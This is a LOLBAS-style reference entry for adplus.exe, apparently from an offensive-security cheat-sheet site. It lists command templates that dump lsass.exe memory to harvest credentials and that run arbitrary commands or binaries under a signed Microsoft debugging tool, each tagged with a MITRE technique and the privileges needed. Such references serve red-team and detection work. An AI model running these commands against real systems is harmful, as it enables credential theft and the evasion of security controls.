🐚 GTFOBins πŸͺŸ LOLBAS πŸ’Ύ Compiled Binaries 🩸 BloodHound 🩸 bloodyAD πŸ“œ Certipy ☁️ Cloud ⚑ goexec πŸ€– HackTricks πŸ”Œ HardwareATT πŸ“¦ Impacket 🏰 InternalATT πŸ”€ Ligolo-ng 🐱 Mimikatz πŸ’£ msfvenom πŸ”§ NetExec πŸ€– OSAI πŸ’₯ PATT 🍳 Recipes 🎟️ Rubeus 🐍 Sliver
πŸͺŸ LOLBAS / adplus.exe

adplus.exe

Debugging tool included with Windows Debugging Tools

Dump

Create memory dump and parse it offline

adplus.exe -hang -pn lsass.exe -o {PATH_ABSOLUTE:folder} -quiet

Creates a memory dump of the lsass process — MITRE: T1003.001 — Privileges: SYSTEM

Run commands under a trusted Microsoft signed binary

adplus.exe -c {PATH:.xml}

Dump process memory using adplus config file (see Resources section for a sample file). — MITRE: T1003.001 — Privileges: SYSTEM

Execute

Run commands under a trusted Microsoft signed binary

adplus.exe -c {PATH:.xml}

Execute arbitrary commands using adplus config file (see Resources section for a sample file). — MITRE: T1127 — Privileges: User

Run commands under a trusted Microsoft signed binary

adplus.exe -crash -o "{PATH_ABSOLUTE:folder}" -sc {PATH:.exe}

Execute arbitrary commands and binaries from the context of adplus. Note that providing an output directory via '-o' is required. — MITRE: T1127 — Privileges: User